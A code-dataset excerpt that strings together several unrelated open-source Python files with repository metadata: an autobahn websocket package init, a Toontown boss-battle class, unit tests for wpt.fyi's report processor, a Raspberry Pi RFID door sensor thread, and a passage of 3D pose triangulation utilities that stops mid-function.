2017-01-13T15:30:39.000Z
|
env/Lib/site-packages/autobahn/websocket/__init__.py
|
AnilCharles96/django_chat_app
|
4b90fa90a703fe002e7e305e85c7621db7275d6f
|
[
"MIT"
] | 3
|
2019-09-18T01:34:23.000Z
|
2021-08-21T23:31:37.000Z
|
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Crossbar.io Technologies GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
from __future__ import absolute_import
from autobahn.websocket.types import ConnectionRequest, ConnectionResponse, \
ConnectionAccept, ConnectionDeny, Message, IncomingMessage, OutgoingMessage
from autobahn.websocket.interfaces import IWebSocketChannel
__all__ = (
'IWebSocketChannel',
'Message',
'IncomingMessage',
'OutgoingMessage',
'ConnectionRequest',
'ConnectionResponse',
'ConnectionAccept',
'ConnectionDeny',
)
| 39.795455
| 79
| 0.700742
|
3eb29f52710f32527b2f9d124727bcfc9fe600e6
| 1,037
|
py
|
Python
|
toontown/coghq/CashbotHQBossBattle.py
|
TheFamiliarScoot/open-toontown
|
678313033174ea7d08e5c2823bd7b473701ff547
|
[
"BSD-3-Clause"
] | 99
|
2019-11-02T22:25:00.000Z
|
2022-02-03T03:48:00.000Z
|
toontown/coghq/CashbotHQBossBattle.py
|
TheFamiliarScoot/open-toontown
|
678313033174ea7d08e5c2823bd7b473701ff547
|
[
"BSD-3-Clause"
] | 42
|
2019-11-03T05:31:08.000Z
|
2022-03-16T22:50:32.000Z
|
toontown/coghq/CashbotHQBossBattle.py
|
TheFamiliarScoot/open-toontown
|
678313033174ea7d08e5c2823bd7b473701ff547
|
[
"BSD-3-Clause"
] | 57
|
2019-11-03T07:47:37.000Z
|
2022-03-22T00:41:49.000Z
|
from pandac.PandaModules import *
from direct.interval.IntervalGlobal import *
from toontown.suit import DistributedCashbotBoss
from direct.directnotify import DirectNotifyGlobal
from toontown.coghq import CogHQBossBattle
class CashbotHQBossBattle(CogHQBossBattle.CogHQBossBattle):
notify = DirectNotifyGlobal.directNotify.newCategory('CashbotHQBossBattle')
def __init__(self, loader, parentFSM, doneEvent):
CogHQBossBattle.CogHQBossBattle.__init__(self, loader, parentFSM, doneEvent)
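        # Presumed teleport-in position (x, y, z) and orientation (h, p, r) for this boss battle.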
self.teleportInPosHpr = (88, -214, 0, 210, 0, 0)
def load(self):
CogHQBossBattle.CogHQBossBattle.load(self)
def unload(self):
CogHQBossBattle.CogHQBossBattle.unload(self)
def enter(self, requestStatus):
CogHQBossBattle.CogHQBossBattle.enter(self, requestStatus, DistributedCashbotBoss.OneBossCog)
def exit(self):
CogHQBossBattle.CogHQBossBattle.exit(self)
def exitCrane(self):
CogHQBossBattle.CogHQBossBattle.exitCrane(self)
messenger.send('exitCrane')
| 35.758621
| 101
| 0.762777
|
7ee26906a38538ac31819b35b93ca4c08f3f5d59
| 23,602
|
py
|
Python
|
results-processor/wptreport_test.py
|
lucacasonato/wpt.fyi
|
abcd336266b6b9a23e0f57be04ca07506270af39
|
[
"BSD-3-Clause"
] | 122
|
2018-05-15T18:54:46.000Z
|
2022-03-31T19:45:35.000Z
|
results-processor/wptreport_test.py
|
lucacasonato/wpt.fyi
|
abcd336266b6b9a23e0f57be04ca07506270af39
|
[
"BSD-3-Clause"
] | 1,947
|
2018-04-10T16:58:57.000Z
|
2022-03-28T18:09:55.000Z
|
results-processor/wptreport_test.py
|
lucacasonato/wpt.fyi
|
abcd336266b6b9a23e0f57be04ca07506270af39
|
[
"BSD-3-Clause"
] | 63
|
2018-04-13T13:51:09.000Z
|
2022-03-15T10:09:23.000Z
|
# Copyright 2018 The WPT Dashboard Project. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import gzip
import io
import json
import os
import shutil
import tempfile
import unittest
from wptreport import (
ConflictingDataError,
InsufficientDataError,
InvalidJSONError,
MissingMetadataError,
WPTReport,
prepare_labels,
normalize_product
)
class WPTReportTest(unittest.TestCase):
def setUp(self):
self.tmp_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.tmp_dir)
def test_write_json(self):
obj = {'results': [{'test': 'foo'}]}
tmp_path = os.path.join(self.tmp_dir, 'test.json')
with open(tmp_path, 'wb') as f:
WPTReport.write_json(f, obj)
with open(tmp_path, 'rt') as f:
round_trip = json.load(f)
self.assertDictEqual(obj, round_trip)
def test_write_gzip_json(self):
# This case also covers the Unicode testing of write_json().
obj = {'results': [{
'test': 'ABC~‾¥≈¤・・•∙·☼★星🌟星★☼·∙•・・¤≈¥‾~XYZ',
'message': None,
'status': 'PASS'
}]}
tmp_path = os.path.join(self.tmp_dir, 'foo', 'bar.json.gz')
WPTReport.write_gzip_json(tmp_path, obj)
with open(tmp_path, 'rb') as f:
with gzip.GzipFile(fileobj=f, mode='rb') as gf:
with io.TextIOWrapper(gf, encoding='utf-8') as tf:
round_trip = json.load(tf)
self.assertDictEqual(obj, round_trip)
def test_load_json(self):
tmp_path = os.path.join(self.tmp_dir, 'test.json')
with open(tmp_path, 'wt') as f:
f.write('{"results": [{"test": "foo"}]}')
r = WPTReport()
with open(tmp_path, 'rb') as f:
r.load_json(f)
self.assertEqual(len(r.results), 1)
# This is the sha1sum of the string written above.
self.assertEqual(r.hashsum(),
'afa59408e1797c7091d7e89de5561612f7da440d')
def test_load_json_empty_report(self):
tmp_path = os.path.join(self.tmp_dir, 'test.json')
with open(tmp_path, 'wt') as f:
f.write('{}')
r = WPTReport()
with open(tmp_path, 'rb') as f:
with self.assertRaises(InsufficientDataError):
r.load_json(f)
def test_load_json_invalid_json(self):
tmp_path = os.path.join(self.tmp_dir, 'test.json')
with open(tmp_path, 'wt') as f:
f.write('{[')
r = WPTReport()
with open(tmp_path, 'rb') as f:
with self.assertRaises(InvalidJSONError):
r.load_json(f)
def test_load_json_multiple_chunks(self):
tmp_path = os.path.join(self.tmp_dir, 'test.json')
r = WPTReport()
with open(tmp_path, 'wt') as f:
f.write('{"results": [{"test1": "foo"}]}\n')
with open(tmp_path, 'rb') as f:
r.load_json(f)
with open(tmp_path, 'wt') as f:
f.write('{"results": [{"test2": "bar"}]}\n')
with open(tmp_path, 'rb') as f:
r.load_json(f)
self.assertEqual(len(r.results), 2)
# This is the sha1sum of the two strings above concatenated.
self.assertEqual(r.hashsum(),
'3aa5e332b892025bc6c301e6578ae0d54375351d')
def test_load_json_multiple_chunks_metadata(self):
tmp_path = os.path.join(self.tmp_dir, 'test.json')
r = WPTReport()
# Load a report with no metadata first to test the handling of None.
with open(tmp_path, 'wt') as f:
f.write('{"results": [{"test": "foo"}]}\n')
with open(tmp_path, 'rb') as f:
r.load_json(f)
with open(tmp_path, 'wt') as f:
json.dump({
'results': [{'test1': 'foo'}],
'run_info': {'product': 'firefox', 'os': 'linux'},
'time_start': 100,
'time_end': 200,
}, f)
with open(tmp_path, 'rb') as f:
r.load_json(f)
with open(tmp_path, 'wt') as f:
json.dump({
'results': [{'test2': 'bar'}],
'run_info': {'product': 'firefox', 'browser_version': '59.0'},
'time_start': 10,
'time_end': 500,
}, f)
with open(tmp_path, 'rb') as f:
r.load_json(f)
self.assertEqual(len(r.results), 3)
# run_info should be the union of all run_info.
self.assertDictEqual(r.run_info, {
'product': 'firefox',
'browser_version': '59.0',
'os': 'linux'
})
# The smallest time_start should be kept.
self.assertEqual(r._report['time_start'], 10)
# The largest time_end should be kept.
self.assertEqual(r._report['time_end'], 500)
def test_load_json_multiple_chunks_conflicting_data(self):
tmp_path = os.path.join(self.tmp_dir, 'test.json')
r = WPTReport()
with open(tmp_path, 'wt') as f:
json.dump({
'results': [{'test1': 'foo'}],
'run_info': {
'revision': '0bdaaf9c1622ca49eb140381af1ece6d8001c934',
'product': 'firefox',
'browser_version': '59',
},
}, f)
with open(tmp_path, 'rb') as f:
r.load_json(f)
with open(tmp_path, 'wt') as f:
json.dump({
'results': [{'test2': 'bar'}],
'run_info': {
'revision': '0bdaaf9c1622ca49eb140381af1ece6d8001c934',
'product': 'chrome',
'browser_version': '70',
},
}, f)
with open(tmp_path, 'rb') as f:
reg = r"product: \[chrome, firefox\], browser_version: \[70, 59\]"
with self.assertRaisesRegex(ConflictingDataError, reg):
r.load_json(f)
# Fields without conflict should be preserved.
self.assertEqual(r.run_info['revision'],
'0bdaaf9c1622ca49eb140381af1ece6d8001c934')
# Conflicting fields should be set to None.
self.assertIsNone(r.run_info['product'])
self.assertIsNone(r.run_info['browser_version'])
def test_load_json_multiple_chunks_ignored_conflicting_data(self):
tmp_path = os.path.join(self.tmp_dir, 'test.json')
r = WPTReport()
with open(tmp_path, 'wt') as f:
json.dump({
'results': [{'test1': 'foo'}],
'run_info': {
'browser_build_id': '1',
'browser_changeset': 'r1',
},
}, f)
with open(tmp_path, 'rb') as f:
r.load_json(f)
with open(tmp_path, 'wt') as f:
json.dump({
'results': [{'test2': 'bar'}],
'run_info': {
'browser_build_id': '2',
'browser_changeset': 'r2',
},
}, f)
with open(tmp_path, 'rb') as f:
r.load_json(f)
self.assertIsNone(r.run_info['browser_build_id'])
self.assertIsNone(r.run_info['browser_changeset'])
def test_load_gzip_json(self):
# This case also covers the Unicode testing of load_json().
obj = {
'results': [{
'test': 'ABC~‾¥≈¤・・•∙·☼★星🌟星★☼·∙•・・¤≈¥‾~XYZ',
'message': None,
'status': 'PASS'
}],
'run_info': {},
}
json_s = json.dumps(obj, ensure_ascii=False)
tmp_path = os.path.join(self.tmp_dir, 'test.json.gz')
with open(tmp_path, 'wb') as f:
gzip_file = gzip.GzipFile(fileobj=f, mode='wb')
gzip_file.write(json_s.encode('utf-8'))
gzip_file.close()
r = WPTReport()
with open(tmp_path, 'rb') as f:
r.load_gzip_json(f)
self.assertDictEqual(r._report, obj)
def test_summarize(self):
r = WPTReport()
r._report = {'results': [
{
'test': '/js/with-statement.html',
'status': 'OK',
'message': None,
'subtests': [
{'status': 'PASS', 'message': None, 'name': 'first'},
{'status': 'FAIL', 'message': 'bad', 'name': 'second'}
]
},
{
'test': '/js/isNaN.html',
'status': 'OK',
'message': None,
'subtests': [
{'status': 'PASS', 'message': None, 'name': 'first'},
{'status': 'FAIL', 'message': 'bad', 'name': 'second'},
{'status': 'PASS', 'message': None, 'name': 'third'}
]
}
]}
self.assertEqual(r.summarize(), {
'/js/with-statement.html': [2, 3],
'/js/isNaN.html': [3, 4]
})
def test_summarize_zero_results(self):
r = WPTReport()
# Do not throw!
r.summarize()
def test_summarize_duplicate_results(self):
r = WPTReport()
r._report = {'results': [
{
'test': '/js/with-statement.html',
'status': 'OK',
'message': None,
'subtests': [
{'status': 'PASS', 'message': None, 'name': 'first'},
{'status': 'FAIL', 'message': 'bad', 'name': 'second'}
]
},
{
'test': '/js/with-statement.html',
'status': 'OK',
'message': None,
'subtests': [
{'status': 'PASS', 'message': None, 'name': 'first'},
{'status': 'FAIL', 'message': 'bad', 'name': 'second'},
{'status': 'FAIL', 'message': 'bad', 'name': 'third'},
{'status': 'FAIL', 'message': 'bad', 'name': 'fourth'}
]
}
]}
with self.assertRaises(ConflictingDataError):
r.summarize()
def test_summarize_whitespaces(self):
r = WPTReport()
r._report = {'results': [
{
'test': ' /ref/reftest.html',
'status': 'PASS',
'message': None,
'subtests': []
},
{
'test': '/ref/reftest-fail.html\n',
'status': 'FAIL',
'message': None,
'subtests': []
}
]}
self.assertEqual(r.summarize(), {
'/ref/reftest.html': [1, 1],
'/ref/reftest-fail.html': [0, 1]
})
def test_each_result(self):
expected_results = [
{
'test': '/js/with-statement.html',
'status': 'OK',
'message': None,
'subtests': [
{'status': 'PASS', 'message': None, 'name': 'first'},
{'status': 'FAIL', 'message': 'bad', 'name': 'second'}
]
},
{
'test': '/js/isNaN.html',
'status': 'OK',
'message': None,
'subtests': [
{'status': 'PASS', 'message': None, 'name': 'first'},
{'status': 'FAIL', 'message': 'bad', 'name': 'second'},
{'status': 'PASS', 'message': None, 'name': 'third'}
]
},
{
'test': '/js/do-while-statement.html',
'status': 'OK',
'message': None,
'subtests': [
{'status': 'PASS', 'message': None, 'name': 'first'}
]
},
{
'test': '/js/symbol-unscopables.html',
'status': 'TIMEOUT',
'message': None,
'subtests': []
},
{
'test': '/js/void-statement.html',
'status': 'OK',
'message': None,
'subtests': [
{'status': 'PASS', 'message': None, 'name': 'first'},
{'status': 'FAIL', 'message': 'bad', 'name': 'second'},
{'status': 'FAIL', 'message': 'bad', 'name': 'third'},
{'status': 'FAIL', 'message': 'bad', 'name': 'fourth'}
]
}
]
r = WPTReport()
r._report = {'results': expected_results}
self.assertListEqual(list(r.each_result()), expected_results)
def test_populate_upload_directory(self):
# This also tests write_summary() and write_result_directory().
revision = '0bdaaf9c1622ca49eb140381af1ece6d8001c934'
r = WPTReport()
r._report = {
'results': [
{
'test': '/foo/bar.html',
'status': 'PASS',
'message': None,
'subtests': []
},
# Whitespaces need to be trimmed from the test name.
{
'test': ' /foo/fail.html\n',
'status': 'FAIL',
'message': None,
'subtests': []
}
],
'run_info': {
'revision': revision,
'product': 'firefox',
'browser_version': '59.0',
'os': 'linux'
}
}
r.hashsum = lambda: '0123456789'
r.populate_upload_directory(output_dir=self.tmp_dir)
self.assertTrue(os.path.isfile(os.path.join(
self.tmp_dir, revision,
'firefox-59.0-linux-0123456789-summary.json.gz'
)))
self.assertTrue(os.path.isfile(os.path.join(
self.tmp_dir, revision,
'firefox-59.0-linux-0123456789', 'foo', 'bar.html'
)))
self.assertTrue(os.path.isfile(os.path.join(
self.tmp_dir, revision,
'firefox-59.0-linux-0123456789', 'foo', 'fail.html'
)))
def test_update_metadata(self):
r = WPTReport()
r.update_metadata(
revision='0bdaaf9c1622ca49eb140381af1ece6d8001c934',
browser_name='firefox',
browser_version='59.0',
os_name='linux',
os_version='4.4'
)
self.assertDictEqual(r.run_info, {
'revision': '0bdaaf9c1622ca49eb140381af1ece6d8001c934',
'product': 'firefox',
'browser_version': '59.0',
'os': 'linux',
'os_version': '4.4'
})
def test_test_run_metadata(self):
r = WPTReport()
r._report = {
'run_info': {
'revision': '0bdaaf9c1622ca49eb140381af1ece6d8001c934',
'product': 'firefox',
'browser_version': '59.0',
'os': 'linux'
}
}
self.assertDictEqual(r.test_run_metadata, {
'browser_name': 'firefox',
'browser_version': '59.0',
'os_name': 'linux',
'revision': '0bdaaf9c16',
'full_revision_hash': '0bdaaf9c1622ca49eb140381af1ece6d8001c934',
})
def test_test_run_metadata_missing_required_fields(self):
r = WPTReport()
r._report = {
'run_info': {
'product': 'firefox',
'os': 'linux'
}
}
with self.assertRaises(MissingMetadataError):
r.test_run_metadata
def test_test_run_metadata_optional_fields(self):
r = WPTReport()
r._report = {
'run_info': {
'revision': '0bdaaf9c1622ca49eb140381af1ece6d8001c934',
'product': 'firefox',
'browser_version': '59.0',
'os': 'windows',
'os_version': '10'
},
'time_start': 1529606394218,
'time_end': 1529611429000,
}
self.assertDictEqual(r.test_run_metadata, {
'browser_name': 'firefox',
'browser_version': '59.0',
'os_name': 'windows',
'os_version': '10',
'revision': '0bdaaf9c16',
'full_revision_hash': '0bdaaf9c1622ca49eb140381af1ece6d8001c934',
'time_start': '2018-06-21T18:39:54.218000+00:00',
'time_end': '2018-06-21T20:03:49+00:00',
})
def test_product_id(self):
r = WPTReport()
r._report = {
'run_info': {
'product': 'firefox',
'browser_version': '59.0',
'os': 'linux',
}
}
r.hashsum = lambda: 'afa59408e1797c7091d7e89de5561612f7da440d'
self.assertEqual(r.product_id(), 'firefox-59.0-linux-afa59408e1')
r._report['run_info']['os_version'] = '4.4'
self.assertEqual(r.product_id(separator='_'),
'firefox_59.0_linux_4.4_afa59408e1')
def test_product_id_sanitize(self):
r = WPTReport()
r._report = {
'run_info': {
'product': 'chrome!',
'browser_version': '1.2.3 dev-1',
'os': 'linux',
}
}
r.hashsum = lambda: 'afa59408e1797c7091d7e89de5561612f7da440d'
self.assertEqual(r.product_id(separator='-', sanitize=True),
'chrome_-1.2.3_dev-1-linux-afa59408e1')
def test_sha_product_path(self):
r = WPTReport()
r._report = {
'run_info': {
'revision': '0bdaaf9c1622ca49eb140381af1ece6d8001c934',
'product': 'firefox',
'browser_version': '59.0',
'os': 'linux'
}
}
r.hashsum = lambda: 'afa59408e1797c7091d7e89de5561612f7da440d'
self.assertEqual(r.sha_product_path,
'0bdaaf9c1622ca49eb140381af1ece6d8001c934/'
'firefox-59.0-linux-afa59408e1')
def test_sha_summary_path(self):
r = WPTReport()
r._report = {
'run_info': {
'revision': '0bdaaf9c1622ca49eb140381af1ece6d8001c934',
'product': 'firefox',
'browser_version': '59.0',
'os': 'linux'
}
}
r.hashsum = lambda: 'afa59408e1797c7091d7e89de5561612f7da440d'
self.assertEqual(r.sha_summary_path,
'0bdaaf9c1622ca49eb140381af1ece6d8001c934/'
'firefox-59.0-linux-afa59408e1-summary.json.gz')
def test_normalize_version(self):
r = WPTReport()
r._report = {'run_info': {
'browser_version': 'Technology Preview (Release 67, 13607.1.9.0.1)'
}}
r.normalize_version()
self.assertEqual(r.run_info['browser_version'], '67 preview')
def test_normalize_version_missing_version(self):
r = WPTReport()
r._report = {'run_info': {}}
r.normalize_version()
# Do not throw!
self.assertIsNone(r.run_info.get('browser_version'))
class HelpersTest(unittest.TestCase):
def test_prepare_labels_from_empty_str(self):
r = WPTReport()
r.update_metadata(browser_name='firefox')
self.assertSetEqual(
prepare_labels(r, '', 'blade-runner'),
{'blade-runner', 'firefox', 'stable'}
)
def test_prepare_labels_from_custom_labels(self):
r = WPTReport()
r.update_metadata(browser_name='firefox')
self.assertSetEqual(
prepare_labels(r, 'foo,bar', 'blade-runner'),
{'bar', 'blade-runner', 'firefox', 'foo', 'stable'}
)
def test_prepare_labels_from_experimental_label(self):
r = WPTReport()
r.update_metadata(browser_name='firefox')
self.assertSetEqual(
prepare_labels(r, 'experimental', 'blade-runner'),
{'blade-runner', 'experimental', 'firefox'}
)
def test_prepare_labels_from_stable_label(self):
r = WPTReport()
r.update_metadata(browser_name='firefox')
self.assertSetEqual(
prepare_labels(r, 'stable', 'blade-runner'),
{'blade-runner', 'firefox', 'stable'}
)
def test_prepare_labels_from_browser_channel(self):
# Chrome Dev
r = WPTReport()
r._report = {
'run_info': {
'product': 'chrome',
'browser_channel': 'dev',
}
}
self.assertSetEqual(
prepare_labels(r, '', 'blade-runner'),
{'blade-runner', 'dev', 'experimental', 'chrome'}
)
# Chrome Canary
r._report['run_info']['browser_channel'] = 'canary'
self.assertSetEqual(
prepare_labels(r, '', 'blade-runner'),
{'blade-runner', 'canary', 'nightly', 'chrome'}
)
# Chrome Nightly
r._report['run_info']['browser_channel'] = 'nightly'
self.assertSetEqual(
prepare_labels(r, '', 'blade-runner'),
{'blade-runner', 'nightly', 'chrome'}
)
# WebKitGTK Nightly
r._report['run_info']['product'] = 'webkitgtk_minibrowser'
self.assertSetEqual(
prepare_labels(r, '', 'blade-runner'),
{'blade-runner', 'nightly', 'experimental',
'webkitgtk_minibrowser'}
)
# Firefox Nightly
r._report['run_info']['product'] = 'firefox'
self.assertSetEqual(
prepare_labels(r, '', 'blade-runner'),
{'blade-runner', 'nightly', 'experimental', 'firefox'}
)
# Firefox Beta
r._report['run_info']['browser_channel'] = 'beta'
self.assertSetEqual(
prepare_labels(r, '', 'blade-runner'),
{'blade-runner', 'beta', 'firefox'}
)
def test_normalize_product_edge_webdriver(self):
r = WPTReport()
r._report = {
'run_info': {
'product': 'edge_webdriver',
}
}
self.assertSetEqual(
normalize_product(r),
{'edge', 'webdriver', 'edge_webdriver'}
)
self.assertEqual(
r.run_info['product'],
'edge'
)
def test_normalize_product_edgechromium(self):
r = WPTReport()
r._report = {
'run_info': {
'product': 'edgechromium',
}
}
self.assertSetEqual(
normalize_product(r),
{'edge', 'edgechromium'}
)
self.assertEqual(
r.run_info['product'],
'edge'
)
def test_normalize_product_webkitgtk_minibrowser(self):
r = WPTReport()
r._report = {
'run_info': {
'product': 'webkitgtk_minibrowser',
}
}
self.assertSetEqual(
normalize_product(r),
{'webkitgtk', 'minibrowser'}
)
self.assertEqual(
r.run_info['product'],
'webkitgtk'
)
def test_normalize_product_noop(self):
r = WPTReport()
r._report = {
'run_info': {
'product': 'firefox',
}
}
self.assertSetEqual(
normalize_product(r),
set()
)
self.assertEqual(
r.run_info['product'],
'firefox'
)
| 33.862267
| 79
| 0.489323
|
1d569132663cf934d615fddae541ac7e28825d17
| 1,803
|
py
|
Python
|
door_interface/helpers/sensor.py
|
itsjesseyo/enjigo_door
|
fd29fd9bd28c1d7915e4f9ad5e29635f5cbc4601
|
[
"Unlicense"
] | 1
|
2015-03-08T23:21:58.000Z
|
2015-03-08T23:21:58.000Z
|
door_interface/helpers/sensor.py
|
luxnovalabs/enjigo_door
|
fd29fd9bd28c1d7915e4f9ad5e29635f5cbc4601
|
[
"Unlicense"
] | null | null | null |
door_interface/helpers/sensor.py
|
luxnovalabs/enjigo_door
|
fd29fd9bd28c1d7915e4f9ad5e29635f5cbc4601
|
[
"Unlicense"
] | 1
|
2018-09-29T23:38:28.000Z
|
2018-09-29T23:38:28.000Z
|
import sys, serial, time, signal, threading
from MFRC522 import MFRC522
from event import Event
class Sensor(threading.Thread):
# main program for reading and processing tags
def __init__(self, name):
threading.Thread.__init__(self)
self.name = name
self.continue_reading = False
self.tag_reader = MFRC522()
self.signal = signal.signal(signal.SIGINT, self.end_read)
self.last_tag = ''
#EVENTS
self.FOUND_TAG = Event()
def end_read(self, signal,frame):
print "Ctrl+C captured, ending read."
self.stop()
def stop(self):
self.continue_reading = False
def run(self):
print "sensor running"
self.continue_reading = True
#if RFID is working - start monitoring it
while self.continue_reading:
(status,TagType) = self.tag_reader.MFRC522_Request(self.tag_reader.PICC_REQIDL)
if status == self.tag_reader.MI_OK:
print "Card detected"
(status,backData) = self.tag_reader.MFRC522_Anticoll()
if status == self.tag_reader.MI_OK:
rfid_tag = "".join(str(val) for val in backData)
print 'TAG : %s' % rfid_tag
self.last_tag = rfid_tag
self.FOUND_TAG(self)
time.sleep(.1)
print 'not reading sensor'
# def start(self):
# print "sensor running"
# self.continue_reading = True
# #if RFID is working - start monitoring it
# while self.continue_reading:
# (status,TagType) = self.tag_reader.MFRC522_Request(self.tag_reader.PICC_REQIDL)
# if status == self.tag_reader.MI_OK:
# print "Card detected"
# (status,backData) = self.tag_reader.MFRC522_Anticoll()
# if status == self.tag_reader.MI_OK:
# rfid_tag = "".join(str(val) for val in backData)
# print 'TAG : %s' % rfid_tag
# self.last_tag = rfid_tag
# self.FOUND_TAG(self)
# time.sleep(.1)
# print 'not reading sensor'
| 27.318182
| 84
| 0.69218
|
f703224172490713b6ea5921d8e35e234816b5d6
| 8,418
|
py
|
Python
|
mvn/utils/op.py
|
K4S4B4/learnable-triangulation-pytorch
|
94f5121919785bf7c89dd973521a21c01104dbd5
|
[
"MIT"
] | null | null | null |
mvn/utils/op.py
|
K4S4B4/learnable-triangulation-pytorch
|
94f5121919785bf7c89dd973521a21c01104dbd5
|
[
"MIT"
] | null | null | null |
mvn/utils/op.py
|
K4S4B4/learnable-triangulation-pytorch
|
94f5121919785bf7c89dd973521a21c01104dbd5
|
[
"MIT"
] | null | null | null |
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from mvn.utils.img import to_numpy, to_torch
from mvn.utils import multiview
def integrate_tensor_2d(heatmaps, softmax=True):
"""Applies softmax to heatmaps and integrates them to get their's "center of masses"
Args:
heatmaps torch tensor of shape (batch_size, n_heatmaps, h, w): input heatmaps
Returns:
        coordinates torch tensor of shape (batch_size, n_heatmaps, 2): coordinates of the centers of mass of all heatmaps
"""
batch_size, n_heatmaps, h, w = heatmaps.shape
heatmaps = heatmaps.reshape((batch_size, n_heatmaps, -1))
if softmax:
heatmaps = nn.functional.softmax(heatmaps, dim=2)
else:
heatmaps = nn.functional.relu(heatmaps)
heatmaps = heatmaps.reshape((batch_size, n_heatmaps, h, w))
mass_x = heatmaps.sum(dim=2)
mass_y = heatmaps.sum(dim=3)
mass_times_coord_x = mass_x * torch.arange(w).type(torch.float).to(mass_x.device)
mass_times_coord_y = mass_y * torch.arange(h).type(torch.float).to(mass_y.device)
x = mass_times_coord_x.sum(dim=2, keepdim=True)
y = mass_times_coord_y.sum(dim=2, keepdim=True)
if not softmax:
x = x / mass_x.sum(dim=2, keepdim=True)
y = y / mass_y.sum(dim=2, keepdim=True)
coordinates = torch.cat((x, y), dim=2)
coordinates = coordinates.reshape((batch_size, n_heatmaps, 2))
return coordinates
def integrate_tensor_3d(volumes, softmax=True):
batch_size, n_volumes, x_size, y_size, z_size = volumes.shape
volumes = volumes.reshape((batch_size, n_volumes, -1))
if softmax:
volumes = nn.functional.softmax(volumes, dim=2)
else:
volumes = nn.functional.relu(volumes)
volumes = volumes.reshape((batch_size, n_volumes, x_size, y_size, z_size))
mass_x = volumes.sum(dim=3).sum(dim=3)
mass_y = volumes.sum(dim=2).sum(dim=3)
mass_z = volumes.sum(dim=2).sum(dim=2)
mass_times_coord_x = mass_x * torch.arange(x_size).type(torch.float).to(mass_x.device)
mass_times_coord_y = mass_y * torch.arange(y_size).type(torch.float).to(mass_y.device)
mass_times_coord_z = mass_z * torch.arange(z_size).type(torch.float).to(mass_z.device)
x = mass_times_coord_x.sum(dim=2, keepdim=True)
y = mass_times_coord_y.sum(dim=2, keepdim=True)
z = mass_times_coord_z.sum(dim=2, keepdim=True)
if not softmax:
x = x / mass_x.sum(dim=2, keepdim=True)
y = y / mass_y.sum(dim=2, keepdim=True)
z = z / mass_z.sum(dim=2, keepdim=True)
coordinates = torch.cat((x, y, z), dim=2)
coordinates = coordinates.reshape((batch_size, n_volumes, 3))
return coordinates, volumes
def integrate_tensor_3d_with_coordinates(volumes, coord_volumes, softmax=True):
batch_size, n_volumes, x_size, y_size, z_size = volumes.shape
volumes = volumes.reshape((batch_size, n_volumes, -1))
if softmax:
volumes = nn.functional.softmax(volumes, dim=2)
else:
volumes = nn.functional.relu(volumes)
volumes = volumes.reshape((batch_size, n_volumes, x_size, y_size, z_size))
coordinates = torch.einsum("bnxyz, bxyzc -> bnc", volumes, coord_volumes)
return coordinates #, volumes
def unproject_heatmaps(heatmaps, proj_matricies, coord_volumes, volume_aggregation_method='sum', vol_confidences=None):
device = heatmaps.device
batch_size, n_views, n_joints, heatmap_shape = heatmaps.shape[0], heatmaps.shape[1], heatmaps.shape[2], tuple(heatmaps.shape[3:]) # 1,4,32,96x96
volume_shape = coord_volumes.shape[1:4] #64x64x64
    volume_batch = torch.zeros(batch_size, n_joints, *volume_shape, device=device) # tensor of shape 1x32x64x64x64
# TODO: speed up this this loop
for batch_i in range(batch_size):
coord_volume = coord_volumes[batch_i] # Bx64x64x64x3 -> 64x64x64x3
grid_coord = coord_volume.reshape((-1, 3)) # 262144x3
volume_batch_to_aggregate = torch.zeros(n_views, n_joints, *volume_shape, device=device) # 4x32x64x64x64
for view_i in range(n_views):
heatmap = heatmaps[batch_i, view_i] # 1x4x32x96x96 -> 32x96x96
            heatmap = heatmap.unsqueeze(0) # 1x32x96x96 (adds a new dimension at the very front)
grid_coord_proj = multiview.project_3d_points_to_image_plane_without_distortion( # 262144x3
proj_matricies[batch_i, view_i], grid_coord, convert_back_to_euclidean=False
)
            invalid_mask = grid_coord_proj[:, 2] <= 0.0 # depth must be larger than 0.0; can happen when the person gets too close to the camera
grid_coord_proj[grid_coord_proj[:, 2] == 0.0, 2] = 1.0 # not to divide by zero
grid_coord_proj = multiview.homogeneous_to_euclidean(grid_coord_proj)
# transform to [-1.0, 1.0] range
grid_coord_proj_transformed = torch.zeros_like(grid_coord_proj) # 262144x2
            grid_coord_proj_transformed[:, 0] = 2 * (grid_coord_proj[:, 0] / heatmap_shape[0] - 0.5) # maps (0,0)->(96,96) pixel coordinates to relative coordinates with center (0,0), top-left (-1,-1) and bottom-right (1,1)
grid_coord_proj_transformed[:, 1] = 2 * (grid_coord_proj[:, 1] / heatmap_shape[1] - 0.5)
grid_coord_proj = grid_coord_proj_transformed
# prepare to F.grid_sample
            grid_coord_proj = grid_coord_proj.unsqueeze(1).unsqueeze(0) # unsqueeze adds one dimension at the given position -> 1x262144x1x2; heatmap is 1x32x96x96
try:
current_volume = F.grid_sample(heatmap, grid_coord_proj, align_corners=True) # 1x32x262144x1 = Heatmap(1x32x96x96), grid_coord_proj(1x262144x1x2)
except TypeError: # old PyTorch
current_volume = F.grid_sample(heatmap, grid_coord_proj)
# zero out non-valid points
current_volume = current_volume.view(n_joints, -1) #32x262144
current_volume[:, invalid_mask] = 0.0
# reshape back to volume
current_volume = current_volume.view(n_joints, *volume_shape) #32x64x64x64
# collect
volume_batch_to_aggregate[view_i] = current_volume
# agregate resulting volume
if volume_aggregation_method.startswith('conf'):
